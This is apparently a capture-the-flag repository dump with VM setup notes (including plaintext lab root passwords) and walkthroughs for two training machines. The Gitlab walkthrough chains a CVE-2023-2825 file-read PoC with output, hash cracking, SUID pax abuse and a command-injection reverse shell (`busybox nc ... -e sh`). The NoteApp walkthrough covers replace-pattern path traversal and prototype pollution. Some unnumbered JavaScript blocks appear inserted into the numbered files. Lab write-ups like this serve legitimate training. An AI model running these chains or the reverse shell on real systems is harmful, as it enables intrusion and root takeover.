https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-login.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/google-exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/google-exploit.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/neo4j-initialize.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/neo4j-initialize.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by VirtualBox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If not, please do so.
13 | 5. You can find the IP address of the machine with arp-scan from your Kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc.
21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc.
22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.121.129
29 | root@192.168.121.129's password:
30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
31 |
32 | * Documentation: https://help.ubuntu.com
33 | * Management: https://landscape.canonical.com
34 | * Support: https://ubuntu.com/advantage
35 |
36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
37 | just raised the bar for easy, resilient and secure K8s cluster deployment.
38 |
39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
40 |
41 | * Canonical Livepatch is available for installation.
42 | - Reduce system reboots and improve kernel security. Activate at:
43 | https://ubuntu.com/livepatch
44 |
45 | 74 packages can be updated.
46 | 28 updates are security updates.
47 |
48 | New release '20.04.6 LTS' available.
49 | Run 'do-release-upgrade' to upgrade to it.
50 |
51 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
53 | root@shimishao:~#
54 | ```
55 |
56 |
57 | 6. If something goes wrong, use the credentials provided below to access the machine.
58 |
59 | # Credentials
60 | ```
61 | root:1a@S3d$FZ
62 | ```
63 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/Screenshots/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Gitlab/Screenshots/image-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/Walkthrough.md:
--------------------------------------------------------------------------------
1 | # Gitlab
2 |
3 | ## High Level Overview
4 |
5 | GitLab is a high-level Linux machine with several vulnerabilities that, when chained, grant root access to the system. The site's robots.txt exposes a list of passwords, which we use to brute-force the login page as the root user. Once logged in, we find GitLab 16.0.0, which is vulnerable to arbitrary file read (CVE-2023-2825), and use it to fetch /etc/passwd, where the plumber user's password hash is stored in place of the usual `x`. Cracking that hash with `john` gives us an SSH login as plumber. A SUID `pax` binary lets us read /root/webapp/app.py, the source of a Flask service listening on localhost, and a crafted curl POST to that service gives us a root shell.
6 |
7 | # Recon
8 |
9 | Nmap finds 2 open TCP ports: SSH and HTTPS.
10 |
11 | 
12 |
13 | ## Site
14 |
15 | The site is running GitLab Enterprise Edition.
16 |
17 | 
18 |
19 | Let’s enumerate the hidden files and folders with `Gobuster`.
20 |
21 | 
22 |
23 | There is a robots.txt file on the site, and it contains what looks like a list of passwords for logging in.
24 |
25 | 
26 |
27 | The default administrator account in GitLab is `root`.
28 |
29 | Let's use Burp Suite Intruder to brute-force the root user's password with that list.
30 |
31 | 
32 |
33 | We found the credentials for the root user in GitLab.
34 |
35 | The GitLab version is shown in the help menu (/help).
36 |
37 | 
38 |
39 | GitLab 16.0.0 is vulnerable to a path traversal, CVE-2023-2825: an attacker can read arbitrary files from the server when an attachment exists in a public project nested under at least five groups. The PoC below creates that group structure itself, which is why it needs valid credentials.
40 |
41 | The POC can be found here:
42 |
43 | [https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py](https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py)
44 |
45 | Set the endpoint, username and password at the top of the script before running it.
46 |
47 | ```jsx
48 | ENDPOINT = "https://gitlab.icsd"
49 | USERNAME = "root"
50 | PASSWORD = "Shadow123123"
51 | ```
52 |
53 | The result of the python script:
54 |
55 | ```jsx
56 | ─# python3 poc.py
57 | [*] Attempting to login...
58 | [*] Login successful as user 'root'
59 | [*] Creating 11 groups with prefix 469
60 | [*] Created group '469-1'
61 | [*] Created group '469-2'
62 | [*] Created group '469-3'
63 | [*] Created group '469-4'
64 | [*] Created group '469-5'
65 | [*] Created group '469-6'
66 | [*] Created group '469-7'
67 | [*] Created group '469-8'
68 | [*] Created group '469-9'
69 | [*] Created group '469-10'
70 | [*] Created group '469-11'
71 | [*] Created public repo '/469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825'
72 | [*] Uploaded file '/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f/file'
73 | [*] Executing exploit, fetching file '/etc/passwd': GET - //469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
74 |
75 | root:x:0:0:root:/root:/bin/bash
76 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
77 | bin:x:2:2:bin:/bin:/usr/sbin/nologin
78 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
79 | sync:x:4:65534:sync:/bin:/bin/sync
80 | games:x:5:60:games:/usr/games:/usr/sbin/nologin
81 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
82 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
83 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
84 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
85 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
86 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
87 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
88 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
89 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
90 | irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
91 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
92 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
93 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
94 | systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
95 | systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
96 | messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
97 | systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
98 | pollinate:x:105:1::/var/cache/pollinate:/bin/false
99 | sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
100 | syslog:x:107:113::/home/syslog:/usr/sbin/nologin
101 | uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
102 | tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
103 | tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
104 | landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
105 | fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
106 | usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
107 | plumber:$y$j9T$Q60srmF7j7UmqQhxTU2/p.$x2mfeh7AqyZr2sAcIT9LTXTEhVIbJ3Oians4wDJdin/:1000:1000:plumber:/home/plumber:/bin/bash
108 | lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
109 | gitlab-www:x:998:999::/var/opt/gitlab/nginx:/bin/false
110 | git:x:997:998::/var/opt/gitlab:/bin/sh
111 | gitlab-redis:x:996:997::/var/opt/gitlab/redis:/bin/false
112 | gitlab-psql:x:995:996::/var/opt/gitlab/postgresql:/bin/sh
113 | registry:x:994:995::/var/opt/gitlab/registry:/bin/sh
114 | ```
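To make the shape of that request explicit, here is an added JavaScript example that rebuilds the traversal path from its parts. It is not part of the PoC or of this walkthrough: the group prefix, group count, project name and upload secret are taken from the output above, and the rule that one `..%2f` hop is needed per path component before `uploads` (eleven groups plus the project, twelve hops) is inferred from that output rather than from GitLab's source. The `looksLikeTraversal` helper is the check a defender would run over access logs.

```javascript
// Added example, not from the PoC or the walkthrough: rebuild the
// CVE-2023-2825 request path so the traversal structure is visible.

// The PoC created groups named "<prefix>-<n>", each nested in the previous.
function nestedGroupPath(prefix, count) {
  const names = [];
  for (let i = 1; i <= count; i++) names.push(`${prefix}-${i}`);
  return names;
}

// One "..%2f" per path component between the host and "uploads" (groups plus
// project) climbs back to the filesystem root; this count is inferred from the
// PoC output above, not taken from GitLab's source. uploadSecret is the
// directory GitLab assigned to the uploaded attachment.
function buildTraversalPath({ groups, project, uploadSecret, target }) {
  const components = [...groups, project];
  const hops = '..%2f'.repeat(components.length);
  // "/etc/passwd" -> "etc%2fpasswd": the separators stay URL-encoded
  const encodedTarget = target.replace(/^\/+/, '').split('/').join('%2f');
  return `//${components.join('/')}/uploads/${uploadSecret}//${hops}${encodedTarget}`;
}

function countHops(requestPath) {
  return (requestPath.match(/\.\.%2f/gi) || []).length;
}

// Detection helper for the defending side: a dot-dot segment followed by an
// encoded or literal slash in a request path is the marker to alert on.
function looksLikeTraversal(requestPath) {
  return /(^|\/|%2f)(\.\.|%2e%2e)(%2f|\/)/i.test(requestPath);
}

// Values from the PoC run above.
const pagePath = buildTraversalPath({
  groups: nestedGroupPath('469', 11),
  project: 'CVE-2023-2825',
  uploadSecret: '2a9cdef69c9b1db6ce7fc909a96cb11f',
  target: '/etc/passwd',
});
```

The encoded `%2f` separators matter: GitLab's router treats them as part of a single path segment, while the file-serving code later resolves them as directory separators, which is the mismatch the traversal relies on.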
115 |
116 | The plumber user's password hash sits in the second field of `/etc/passwd` rather than in `/etc/shadow` (that field normally holds just `x`), so anyone who can read the file can crack it. The `$y$` prefix marks a yescrypt hash. Let's crack it with the following `john` command; `--format=crypt` hands the hash to the system's crypt(3), which is what supports yescrypt.
117 |
118 | ```jsx
119 | john --format=crypt hash.txt
120 | ```
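Before running john it is worth checking the whole passwd dump for this misconfiguration, not just the one user that stands out. The following JavaScript is an added example, not part of the walkthrough: it parses a passwd file, flags every entry whose password field holds a crypt(3) hash instead of `x` (shadowed), `*`/`!` (locked) or nothing, names the hash algorithm from its prefix, and writes `user:hash` lines in the form john expects. The sample input is constructed from a few of the lines above.

```javascript
// Added example, not part of the walkthrough: find password hashes stored in
// /etc/passwd instead of /etc/shadow and prepare them for john.

// crypt(3) prefixes and the algorithms they denote ("$y$" above is yescrypt).
const CRYPT_PREFIXES = [
  ['$y$', 'yescrypt'], ['$7$', 'scrypt'], ['$6$', 'sha512crypt'],
  ['$5$', 'sha256crypt'], ['$2a$', 'bcrypt'], ['$2b$', 'bcrypt'],
  ['$2y$', 'bcrypt'], ['$1$', 'md5crypt'],
];

function hashAlgorithm(field) {
  for (const [prefix, name] of CRYPT_PREFIXES) {
    if (field.startsWith(prefix)) return name;
  }
  // Traditional DES crypt: 13 characters from the crypt alphabet.
  return /^[./0-9A-Za-z]{13}$/.test(field) ? 'descrypt' : 'unknown';
}

// An entry is exposed when its password field is neither "x" (shadowed),
// "*"/"!" (locked) nor empty, i.e. it carries the hash itself.
function findExposedHashes(passwdText) {
  const found = [];
  for (const rawLine of passwdText.split('\n')) {
    const line = rawLine.trim();
    if (!line || line.startsWith('#')) continue;
    const fields = line.split(':');
    if (fields.length < 7) continue; // malformed line, skip it
    const [user, pw, uid, , , , shell] = fields;
    if (pw === 'x' || pw === '' || /^[*!]+$/.test(pw)) continue;
    found.push({ user, hash: pw, algorithm: hashAlgorithm(pw), uid: Number(uid), shell });
  }
  return found;
}

// One "user:hash" line per entry, which is what `john --format=crypt` reads.
function toJohnInput(entries) {
  return entries.map((e) => `${e.user}:${e.hash}`).join('\n') + '\n';
}

// Constructed sample in the shape of the /etc/passwd dump above.
const SAMPLE_PASSWD = [
  'root:x:0:0:root:/root:/bin/bash',
  'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin',
  'plumber:$y$j9T$Q60srmF7j7UmqQhxTU2/p.$x2mfeh7AqyZr2sAcIT9LTXTEhVIbJ3Oians4wDJdin/:1000:1000:plumber:/home/plumber:/bin/bash',
  'git:x:997:998::/var/opt/gitlab:/bin/sh',
  'locked:!:1001:1001::/home/locked:/bin/bash',
].join('\n');
```

Write `toJohnInput(findExposedHashes(text))` to `hash.txt` and the john command above works unchanged; the `shell` field tells you which of the exposed accounts are worth cracking first.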
121 |
122 | 
123 |
124 | With these credentials, we can SSH in as the plumber user.
125 |
126 | 
127 |
128 | Let's list the listening ports with the following command (`ss -tulnp` gives the same view on hosts without net-tools).
129 |
130 | ```jsx
131 | netstat -tulnp
132 | ```
133 |
134 | 
135 |
136 | Port 10080 is bound to localhost only, which is why nmap did not see it. Let's send it a curl request.
137 |
138 | ```jsx
139 | plumber@plumber:~$ curl 127.0.0.1:10080
140 | Cannot resolve GET request
141 | plumber@plumber:~$
142 | ```
143 |
144 | The service rejects GET, so let's try a POST.
145 |
146 | ```jsx
147 | plumber@plumber:~$ curl -XPOST 127.0.0.1:10080
148 |
151 | TypeError: expected str, bytes or os.PathLike object, not NoneType
152 | .....
153 | SHORTENED
154 | .....
157 | This is the Copy/Paste friendly version of the traceback.
178 | The debugger caught an exception in your WSGI application. You can now
179 | look at the traceback which led to the error.
180 | If you enable JavaScript you can also use additional features such as code
181 | execution (if the evalex feature is enabled), automatic pasting of the
182 | exceptions and much more.
192 | Console Locked
194 | The console is locked and needs to be unlocked by entering the PIN.
195 | You can find the PIN printed out on the standard output of your
196 | shell that runs the server.
227 | plumber@plumber:~$
228 | ```
229 |
230 | This is the Werkzeug debugger page that Flask returns on an unhandled exception when it runs with `debug=True`, and the (shortened) traceback points at the source file behind the service: `/root/webapp/app.py`. The `TypeError` is informative too: an empty POST left a form field as `None`, and the code passed that straight into a call expecting a string or path. We cannot read `/root` as plumber, though, and the interactive console is PIN-locked.
231 |
232 | Enumeration is the key.
233 |
234 | Searching for SUID binaries shows that `pax` has the SUID bit set. Following the GTFOBins SUID entry for pax, we can abuse it to read files as root:
235 |
236 | ```jsx
237 | LFILE=file_to_read
238 | pax -w "$LFILE"
239 | ```
240 |
241 | Pointing `LFILE` at the Flask source dumps it to the terminal. `pax -w` writes a ustar archive to stdout, so the file body is preceded by a binary archive header (the `ustar00rootroot` bytes below); pipe the output through `tar -xOf -` if you only want the file contents.
242 |
243 | ```jsx
244 | plumber@plumber:~$ LFILE="/root/webapp/app.py"
245 | pax -w "$LFILE"
246 | /root/webapp/app.py010064400000000000000000000011111450271307700132670ustar00rootrootfrom flask import Flask, request, render_template
247 | import os
248 |
249 | app = Flask(__name__)
250 |
251 | # Define the route for the home page
252 | @app.route('/', methods=['GET','POST'])
253 | def index():
254 |     if request.method == 'POST':
255 |         # Get the user input from the form
256 |         user_input = request.form.get('user_input')
257 |         # Print the user input to the console
258 |         # os.system() hands the raw form value to /bin/sh: command injection
259 |         print("User Input:", os.system(user_input))
260 |     elif request.method == 'GET':
261 |         return "Cannot resolve GET request"
262 |
263 |     # return render_template('index.html')
264 |
265 | if __name__ == '__main__':
266 |     # debug=True is what exposes the Werkzeug debugger page seen above
267 |     app.run(debug=True, port=10080)
266 | plumber@plumber:~$
267 | ```
268 |
269 | The view passes the `user_input` form field straight to `os.system()`, so any shell command we send runs as the user the Flask service runs as, which is root here. Start a listener on the attacking machine first (for example `nc -lvnp 12342`), then trigger it with the following command. The request will not return cleanly, because `os.system()` blocks until the shell exits and the view returns no response, but the shell connects back regardless.
270 |
271 | ```jsx
272 | plumber@plumber:~$ curl -XPOST localhost:10080 -d "user_input=busybox nc 192.168.47.128 12342 -e sh"
273 | ```
274 |
275 | 
276 |
277 | Thank you for Reading!!
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by VirtualBox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If not, please do so.
13 | 5. You can find the IP address of the machine with arp-scan from your Kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc.
21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc.
22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.121.129
29 | root@192.168.121.129's password:
30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
31 |
32 | * Documentation: https://help.ubuntu.com
33 | * Management: https://landscape.canonical.com
34 | * Support: https://ubuntu.com/advantage
35 |
36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
37 | just raised the bar for easy, resilient and secure K8s cluster deployment.
38 |
39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
40 |
41 | * Canonical Livepatch is available for installation.
42 | - Reduce system reboots and improve kernel security. Activate at:
43 | https://ubuntu.com/livepatch
44 |
45 | 74 packages can be updated.
46 | 28 updates are security updates.
47 |
48 | New release '20.04.6 LTS' available.
49 | Run 'do-release-upgrade' to upgrade to it.
50 |
51 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
53 | root@shimishao:~#
54 | ```
55 |
56 |
57 | 6. If something goes wrong, use the credentials provided below to access the machine.
58 |
59 | # Credentials
60 | ```
61 | root:Zold3kMnsn@M1n3
62 | ```
63 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/Screenshots/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/NoteApp/Screenshots/image-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/Walkthrough.md:
--------------------------------------------------------------------------------
1 | # NoteApp
2 |
3 | ## High Level Overview
4 |
5 | NoteApp is a high-level Linux machine with several vulnerabilities that, when chained, grant root access to the system. Reviewing the application's source code, we find that the GenerateNoteUrl() function passes user input straight into JavaScript's `.replace()`, whose replacement string interprets special `$` patterns; we exploit this to reach hidden endpoints of the internal service. There, the /api/admin/create-admin-user endpoint is vulnerable to prototype pollution, which lets us create a user with admin privileges, and the /api/admin/delete-profile-photo endpoint has a command injection that we use to run a reverse shell. With a shell as a low-privileged user, we find that rsync has the SUID bit set and use the GTFOBins SUID entry for it to obtain a root shell.
6 |
7 | # Recon
8 |
9 | Nmap finds 1 open TCP port: HTTP on 8080.
10 |
11 | 
12 |
13 | ## Site
14 |
15 | The landing page ('/') links to the application's GitHub source code.
16 |
17 | 
18 |
19 | 
20 |
21 | Reading the source, we find that the application is split into two services, 'Gateway' and 'Internal'.
22 |
23 | The 'Internal' service's port is reachable only locally; the host firewall blocks direct access from outside, so every request to it has to pass through the Gateway.
24 |
25 | ## GitHub Endpoints
26 |
27 | ### /sign-in and /sign-up
28 |
29 | 
30 |
31 | As its name suggests, the 'Gateway' service proxies requests between the NoteApp user and the 'Internal' service.
32 |
33 | We can register and log in, which lets us send authenticated requests to the endpoints below.
34 |
35 | 
36 |
37 | ### Sign-Up request in BurpSuite
38 |
39 | ```bash
40 | POST /sign-up HTTP/1.1
41 | Host: noteapp.icsd:8080
42 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
43 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
44 | Accept-Language: en-US,en;q=0.5
45 | Accept-Encoding: gzip, deflate
46 | Connection: close
47 | Upgrade-Insecure-Requests: 1
48 | Content-Type: application/json
49 | Content-Length: 95
50 |
51 | {"email": "huseyn.aghazada@prosol.az","username":"huseyna12","password":"hehehe12","age": 12
52 | }
53 | ```
54 |
55 | 
56 |
57 | ### Sign-In request in BurpSuite
58 |
59 | ```bash
60 | POST /sign-in HTTP/1.1
61 | Host: noteapp.icsd:8080
62 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
63 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
64 | Accept-Language: en-US,en;q=0.5
65 | Accept-Encoding: gzip, deflate
66 | Connection: close
67 | Upgrade-Insecure-Requests: 1
68 | Content-Type: application/json
69 | Content-Length: 62
70 |
71 | {"email": "huseyn.aghazada@prosol.az","password":"hehehe12"
72 | }
73 | ```
74 |
75 | 
76 |
77 | ### GenerateNoteUrl
78 |
79 | This URL generator passes the NoteId straight into JavaScript's `.replace()` method.
80 |
81 | 
82 |
83 | The MDN documentation for `.replace()` shows that it takes a string or `RegExp` as the pattern, and that when the replacement is a string, special `$` patterns in it are interpreted rather than copied literally.
84 |
85 | 
86 |
87 | Let’s put these things together.
88 |
89 | ```jsx
90 | const noteUrl = `${base_url}method-user-note/:NoteId:/`;
91 |
92 | const GenerateNoteUrl = (method, NoteId) => {
93 |     return noteUrl.replace('method', method).replace(':NoteId:', NoteId);
94 | };
95 | ```
96 |
97 | The `method` argument of the first `replace()` is not attacker-controlled, but `NoteId` in the second one comes from user input, so let's look at that second `.replace()` call.
98 |
99 | As the [MDN page](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace) explains, `$'` in a replacement string inserts the portion of the original string that follows the matched substring. Here the text after `:NoteId:` is `/`, so every `$'` in the NoteId becomes a path separator, which lets us inject `../` segments into the generated URL.
100 |
101 | For simplicity, I used the following node script.
102 |
103 | ```jsx
104 | const noteUrl = 'http://localhost/:8080/get-user-note/:NoteId:/'
105 | USERINPUT = `huseyn$'aghazada`
106 | noteUrl.replace(':NoteId:', USERINPUT);
107 | ```
108 |
109 | 
110 |
111 | This means we can reach hidden `Internal` service endpoints, such as the `/first_flag` endpoint that I added, by sending the traversal through the Gateway.
112 |
113 | 
114 |
115 | 
116 |
117 | After successfully retrieving the first flag, we can go for the second flag.
118 |
119 | The screenshot of ./internal/app.js above also shows that a `_method=METHOD` query parameter overrides the HTTP method the Internal service sees, so a PUT sent through the Gateway can become a POST internally.
120 |
121 | To confirm:
122 |
123 | 
124 |
125 | The `_method` query parameter overrides the method as expected.
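To see the whole chain in one place, here is an added JavaScript example (not the application's code) that feeds the decoded NoteId used in the admin requests later in this walkthrough through GenerateNoteUrl, resolves the result the way an HTTP client would, and then shows a safe variant. The Internal base URL `http://internal.local:3000/api/user/`, the `update` method name, the method allowlist and the UUID format for note ids are assumptions made for the example.

```javascript
// Added example, not the application's code. Assumed: the Internal base URL,
// the "update" method name and the UUID format of real note ids.
const base_url = 'http://internal.local:3000/api/user/';
const noteUrl = `${base_url}method-user-note/:NoteId:/`;

// Vulnerable builder, as in the walkthrough: NoteId is used as a replacement
// string, so "$'" expands to the text after the match, which here is "/".
const GenerateNoteUrl = (method, NoteId) =>
  noteUrl.replace('method', method).replace(':NoteId:', NoteId);

// Express decodes route parameters before the handler sees them, so this is
// what req.params.NoteId holds for the admin requests later in the walkthrough.
const maliciousNoteId = decodeURIComponent("..$'..$'admin$'create-admin-user%3F_method=POST&");

// Resolve the generated string the way an HTTP client would: dot segments
// collapse and "?" starts the query, where _method overrides the verb.
function resolveTarget(urlString) {
  const u = new URL(urlString);
  return { path: u.pathname, method: u.searchParams.get('_method') };
}

// A function replacement is inserted verbatim: "$" patterns are never parsed.
function replaceLiteral(template, token, value) {
  return template.replace(token, () => value);
}

// Safe builder: allowlist the method, require a UUID note id, URL-encode it
// and insert both through function replacements.
const NOTE_ID = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
function SafeGenerateNoteUrl(method, NoteId) {
  if (!/^(get|update|delete)$/.test(method)) throw new Error('unknown method');
  if (!NOTE_ID.test(NoteId)) throw new Error('invalid NoteId');
  const withMethod = replaceLiteral(noteUrl, 'method', method);
  return replaceLiteral(withMethod, ':NoteId:', encodeURIComponent(NoteId));
}
```

Note that the function replacement alone only stops the `$'` expansion; without the allowlist and `encodeURIComponent`, a NoteId could still carry a literal `?` and append query parameters such as `_method`, so both layers are needed.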
126 |
127 | ### Prototype Pollution
128 |
129 | The code in `AdminController.js` lets us create an admin user through prototype pollution.
130 |
131 | ```jsx
132 | exports.CreateAdminUser = (req, res) => {
133 |     const errors = validationResult(req);
134 |     if (!errors.isEmpty()) {
135 |         return res.status(400).json({ errors: errors.array() });
136 |     }
137 |     const user = req.body; // vulnerable: the body is used as-is, keys included
138 |
139 |     if (user.isAdmin && user.SecretCode !== SecretCode) {
140 |         return res.status(401).json({ message: 'No Admin User is created!!!' });
141 |     }
142 |     else {
143 |         let NewUser = Object.assign(DefaultUser, user); // vulnerable: mutates the shared DefaultUser; a "__proto__" key in the body replaces its prototype
144 |         if (NewUser.isAdmin) {
145 |             bcrypt.hash(NewUser.password, 10, (err, hashedPassword) => {
146 |                 if (err) {
147 |                     return res.status(500).json({ message: 'Error hashing password' });
148 |                 }
149 |
150 |                 AdminUser.findByUsername(NewUser.username, (existingAdminUserByUsername) => {
151 |                     if (existingAdminUserByUsername) {
152 |                         return res.status(400).json({ message: 'Username is already taken' });
153 |                     }
154 |                     AdminUser.create(NewUser.username, hashedPassword, (adminId) => {
155 |                         return res.status(201).json({ message: 'Admin User is successfully created', adminId });
156 |                     });
157 |                 });
158 |             });
159 |         }
160 |         else {
161 |             return res.status(401).json({ message: 'No Admin User is created!!!' });
162 |         }
163 |     }
164 | };
165 | ```
166 |
